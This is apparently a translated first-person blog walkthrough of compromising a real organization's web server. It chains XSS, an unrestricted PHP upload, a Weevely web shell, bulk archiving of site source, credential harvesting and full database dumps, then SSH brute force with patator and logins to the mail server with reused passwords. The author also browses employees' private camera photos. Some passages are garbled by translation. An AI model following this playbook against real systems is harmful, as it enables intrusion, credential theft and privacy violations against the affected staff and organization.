Testing for site penetration is one of the most common types of cybercrimes. The reason is simple: sites have a lot of vulnerabilities and exploits for them. The most common purpose of the crack is to place malicious code on it, which can infect its visitors. Hacking a site is often carried out in order to steal confidential data, such as the database of customers. Often, the purpose of a registered hack is to disable the website, the actual destruction of its content. But sometimes sites crack their hooliganism: replace the content of the page, or place their “joking” content on the site.
1. Web application vulnerability search.
The site was a web application written from scratch.
To use functions, you need to enter your login and password, but there is a guest login, so the site has guest login credentials right on the home page.
The actions have a title and specific text.
Saved fields were found to be unfiltered into special characters and words, so it was quickly possible to find and confirm the vulnerability of XSS – i.e. you type something like
With this vulnerability you can, for example, steal cookies of other users.
But the problem is that apparently the History is different for each user.
The best I can do in this situation is to steal cookies from users with exactly the same rights as me – i.e. only from users who login under a guest account.
It is possible that the admin has a history list of all users – but not a fact.
Plus we have to figure out how to provoke him to go into History – it may happen that the next time he will go in a year, or two, or never.
Since you can see that the special characters are not filtered, and the data is most likely stored in a database, it may mean that there has to be a SQL injection vulnerability that allows the database to be retrieved.
But I didn’t have time to check it, a much lighter vulnerability was found: the unsecured uploading of files.
The point is that if I started a new action, I had several fields available for input, in which I found XSS and could detect the SQL injection.
But when I opened the saved action from History, another field appeared on the page – for downloading a file!!
I had a moderate joy: on the one hand, it is possible to upload files to many sites, but due to the limitation on the extensions of uploaded files, as well as the way to access them, it is almost impossible to download code that can be executed on a server.
But the carelessness of filtering the data in the text fields gave some hope.
I created the file.
And uploaded it to the server.
The server showed me the link to this file. So the file is uploaded!
I clicked on the link and instead of downloading or showing the content, the file was executed, i.e. I saw the information that the function phpinfo().
What are the programmer’s mistakes:
This programming style cannot be combined with a public account.
This would take a long time to find and exploit these vulnerabilities if the login credentials were not written on the homepage.
Above all: When writing code, you should always filter the data and restrict the files that can be uploaded to the server.
Even if you program “for yourself” and keep the files on the local server on your computer, you can still get in trouble – someone can connect to your web server via the local network (when using the public Internet) or your computer can be accessed directly via white IP.
Obviously, for a public site, the code must be written with a constant security consciousness.
2. Backdoor upload to server
In the beginning I wanted to use the simplest option – c99unlimited.php. It was a file manager and it is convenient to wander through directories and download files.
But it didn’t work for me, it gave me bug 500.
Server seems to have some incompatibilities with it.
This is absolutely no problem, there are a lot of different shells in Webshells – you can sit and choose the one you like for a long time, but I decided to use even more favorite Weevely.
I have even more feelings for this tool )))).
While it has a command line interface, I like it even better.
And we connect to it:
Browse to the server from backdoor.
Let’s see what my rights to this folder are:
drwxrwx 2 XX1 root 4096 Apr 21 14:16
From this information it follows that the owner of the folder is the user XX1. But everybody has write permissions at all.
who am I, by the way?
I work from a user www-data.
4. How to download the source code of the sites from the server.
Oh yes, why did I suddenly rush to look for a folder with the right to record? The fact is that I need to download the files with the source code – for further analysis “in a calm environment. There are a lot of these files and it will take a long time to download them all one by one. So I have a plan – to pack all the files in the archive, and the archive to download.
Self, you can use the services of the folder /tmp, which is always open to the record for everyone. But from the folder /tmp I can download only with Weevely. But if I can save the archive to a web server folder, I can download it directly from my web browser or any file downloader. This is especially true if the file is very large – it can be useful to download the file after breaking the connection, which can’t be done with Weevely on the command line.
Of course, if we are in the folder /var/www/XX1/tmp, the web server folder is /var/www/. Let’s see what’s in it:
ls -l /var/www/
There are a total of 14 folders of other sites in it, but I can’t show them anymore.
Look in the cheat sheet, to save the files to the archive with the command zip you need to additionally use the option -r to add recursively everything in the folders, it starts as follows:
zip -r name of the new_archive. zip directory_for_archiving
The directory for archiving is /var/www/, I will save the archive to the directory /tmp for now (not to a folder with sites, because we will try to save the archive to a folder that is added to that archive – this may cause an error).
f – after this option the path to the archive and the file name are specified
Transfer the archive to a folder on the web server where it is now available for downloading even with a browser:
mv /tmp/archive.tgz /var/www/XX1/tmp
To know the size of all subfolders in /var/www/:
du -sh /var/www/*
If you need to download only some folders, this is done with the view command:
tar czf archive.tgz folder_to_archive_1 folder_to_archive_2 folder_to_archive_3 folder_to_4
5. How to know which sites are running on the server.
The source code is a very valuable trophy and it will help us a lot. But, as I said, there are a lot of folders with sites on this server – that is, there are a lot of sites.
Links of all downloaded settings and processed virtual hosts can be found by option –S. And with –t -D DUMP_INCLUDES, you can see all configuration files used. The problem is that the executable file on the web server can be called either httpd or apache2 depending on the system. On Debian derivatives, the file will be called apache2. On the Arch Linux derivatives it will be called httpd. Basically, there is no problem to try both commands and see which one will work:
httpd -t -D DUMP_INCLUDES
apache2 -t -D DUMP_INCLUDES
As I said, under normal conditions these options should show all configuration files and all virtual hosts. But it seems that the programmer who wrote the code for the site has also started to configure the web server – instead of the expected information I only get an error message in one of the configuration files – I do not have enough SSL certificate. By the way, it means that when you restart your computer or just the web server – Apache, in theory, will not start, because it is (like) a fatal error.
Okay, let’s check manually. If the binary is called apache2, then the configuration files are stored in /etc/apache2/.
The main Apache configuration file is /etc/apache2/apache2. conf.
Folder /etc/apache2/conf-available contains other configuration files, and in the folder /etc/apache2/conf-enabled you can see which are connected.
In the folder /etc/apache2/mods-enabled, you can see which Apache modules are enabled.
In the folder /etc/apache2/sites-available, you can see which sites are currently active, and in the folder /etc/apache2/sites-enabled, you can see which sites are currently active.
Sorry, I can’t show you the content, I can only say, there are 18 configuration files in sites-available. These files have at least 2 mandatory directives for each site:
ServerName – this is the host name, actually the domain of the site (sometimes a subdomain)
DocumentRoot is the path to the files on that server for that host
This technique allows you to find out which other sites this server hosts and where the source code for each of them resides on the server.
With the above technique (analyze virtual hosts and view the content of site folders), we find the address phpMyAdmin. But phpMyAdmin may not exist – it’s okay, you can work with the database through the console.
The main thing is to analyze the source code of the sites and find the credentials there. To simplify this task, you can search through the content of the files, paying special attention to lines like:
Also files with descriptive names like connectdb.php.
Weevely has a command to connect to MySQL from the command line:
:sql_console -user USER -passwd Password -host localhost
Either if MySQL allows remote connections, you can connect directly to the host:
mysql -u USER-PAROL -h IP_SERVERS
Inside, you can view the databases:
Inside, you can view the database tables and the table contents.
mysqldump -u USER-PAROL –all-databases > all-databases.sql
We have usernames and passwords (as well as email’s and other typical profile information). The administrator password to login to the service is the same as the root password from MySQL. Let me remind you, if you’re confused: we found the password from MySQL in the source code of the site files, and the password of the service (site) administrator we found in the database. Although they turned out to be the same.
But even more interesting is the analysis of all user passwords – almost all of them are six-digit numbers! Apparently, the credentials were generated and issued by the administrator. The administrator tends to create similar passwords – let’s consider this. That is, if we have to brute-force services on this service (and we have to), I already know what the dictionary will be like – it will be a full list of six-digit numbers. In general, if passwords are the same, it makes sense to search for other services, then suddenly our existing logins and passwords will also fit there.
Password obtained from DBMS, access to databases obtained, it is possible to edit databases
User passwords from the services have been obtained
Password analysis has revealed a clear pattern
Other sites have been found and their source code has been obtained
Maybe you can already make a report to the customer owner and quit this security assessment.
This report is not good.
There is now nowhere without cameras: cookies are stolen in the rest room, workers do not work at work, in the toilets miss the urinal … This organization is also no exception. I did not just show you in the first part how to check the size of folders and how to selectively archive folders on the web server. Two hosts turned out to be a storage for dozens of gigabytes of photos. Everything is decent there, the only thing is cameras with built-in motion sensor, so the recording only takes place when someone is in the room. One of the cameras is installed in the recreation room – where there is tea, food, TV. So, if you look at these photos at an accelerated pace (it turns out as a video), you get the surrealistic impression that people in this organization are eating without end… The day goes like this: the sun rises, the first people come in and start drinking coffee, then they start eating, then they leave and others start eating, then more people come and start eating, then these people leave and others come with their food and eat again, and it repeats and repeats until sunset… Then the next day is exactly like this, people eat, eat, eat, and like this for almost 100 GB…
And the web interface with a weak password to view all this “good” is located on the subdomain of the site accessible from the Global Network.
7. Search for weak server settings.
Italy, we’ve already shaken everything we can from the websites – source code, databases, user passwords.
Let’s take a look at the server itself – what we have access to, what settings are weak, what information we can get about the system, users, running services.
And we wait for the results.
Information is a lot. System and kernel information can be used to search for exploits that perform privilege escalation – elevation.
Information is obtained about users (name, IP, last login date) who have logged in – their names can be used for SSH brute-force (brute force password search). And one of the users has a local address of 10.*.*.* – this gives us a hint about the structure of the local network.
This shows which of the users is the administrator, and also the accounts that recently used sudo (i.e. who has the right to execute commands with higher privileges – such accounts are of primary interest).
Saved information about network interfaces, shown local IP – you can scan the network for other connected devices.
Saved listening ports (those you can connect to) – many of them. They are worth checking because there may be interesting services there.
The information about the running processes indicates that the mail server, the proxy, the DNS server, the IP camera service is running.
The version numbers of the popular services are collected – in case we are looking for exploits.
In the middle of interesting files nmap is suddenly found – you can scan the host directly from yourself – this will give super fast results.
8. Brute force SSH and FTP.
Two users with administrator rights were found on the server, root and another one, whose name I can’t give you.
The analysis of the source code of web interfaces for viewing the photos saved from cameras gave another password – also from six digits. I noticed that the owner of the web server folders where the photos are located is not Apache (not www-data), but different users. It turned out that FTP credentials are provided for them, and under them you can login via SSH, and in both cases the administrator password is suitable for both root MySQL and the service on the site. Unfortunately, these users have no rights to execute commands from sudo. That is, I already have access to what they have access to (except that you can edit site files under these users).
But the saddest thing is that this very administrator password does not work for the Linux user, also does not work for the root account. To be honest, at first I was even surprised – it fits everything, but it doesn’t… Apparently, the passwords for these users were invented by outsourcing…
Let’s assume that the password is still six digits long. Then let’s generate it with maskprocessor:
maskprocessor ?d?d?d?d > dig.pass
I prefer patator.
I wanted to run the password collection directly from the server. Python was installed there but it wasn’t paramiko, so I got an error:
ERROR: paramiko 184.108.40.206 (http://www.paramiko.org/) is required to run ssh_login.
How it turned out that the server was login with root and the file /etc/ssh/sshd_config was changed. I don’t know if this is related to my activity or if the admin just decided to “twist security”. I took a look at the SSH configuration file:
The most important thing about the docrutka is this kind of directive:
That is, instead of port 22, the SSH server now runs on port 40022 – apparently, so that no one would guess.
To solve this problem in the patator you need to specify a non-standard port:
patator ssh_login host=IP port=40022 user=root password=FILE0 0=dig.pass -x ignore:mesg=’Authentication failed.’
If the overkill is not complete, the patator will print something like:
If you want to continue from where the stop was made, the next time you run patator, add this line to the command, it’s like this:
patator ssh_login host=IP port=40022 user=root password=FILE0 0=dig.pass -x ignore:mesg=’Authentication failed’. –resume 3591,3577,3564,3592,3572,3588,3588,3568,3584,3588
A successful password recovery from a Linux user root or from a user who has rights to execute commands from sudo means the most complete compromise of the server – a complete hack. It is no longer possible to crack harder – any settings, any files, any actions on the server become available.
9. Hack into mail.
As I said, the nmap program was installed on the server, so I decided to study the local network of the server.
Have looked at the local IP:
Runned a scan, but found nothing:
nmap -sn 192.168.144.0/24
tracepath -n ya.ru
showed that the server was directly connected to the ISP – which, in general, should have been obvious – it was the same server, they all had external IP.
Among other things there was information Kerio Connect 9.2.1 and open ssl/http Kerio MailServer http config. How I Googled it is a mail service.
Mentioning about the mail service I already saw in the information on one of the hosts (subdomains) – it said that the mail now moved to Yandex, so I somehow quickly forgot about it.
But it turned out that if you enter the IP with the correct port number in the browser, it opens a form to enter the mail of the organization. I tried several accounts (username and password) from the database – many of them came up.
Including the admin password from the administrator’s mail came up.
Post had been used for several years but had been abandoned for almost a year.
The importance of hacking mail hardly needs to be explained – the information accumulated over the years, data about employees (this is in addition to their photos, which were extracted a little bit wound), opportunities for social engineering – so I thought that this server would be enough.
You may think that this story is just a list of all the most childish and ridiculous mistakes that can only be made by a beginner school programmer and administrator. They say this does not happen in real life. It happens… It’s an absolutely real parse, a real server.
Unfortunately, I can’t even say in general about the context of this case. But the fact is that the organization to which this server belongs is in Moscow and it has a big tricolor hanging on the wall for a reason.
You may notice that I used specialized utilities to a minimum. Almost all the “hacks” were that I knew where and what to watch and just watched it. Therefore, training in security audit of sites (hacking) is not only about learning specialized utilities. First of all it is necessary to understand the processes that are going on. If we are talking about sites, we need to understand how they function. I can’t imagine how a website penetration test can be done if there is no PHP programming skills and at least some experience in creating websites and web applications (CMS, engines, etc.). If pentesting continues on a server there is simply nothing to do without such peaceful skills as:
understanding the server, the ability to configure it
understanding the Linux operating system, its internal device
knowing the command line and at least the most popular Linux commands (utilities).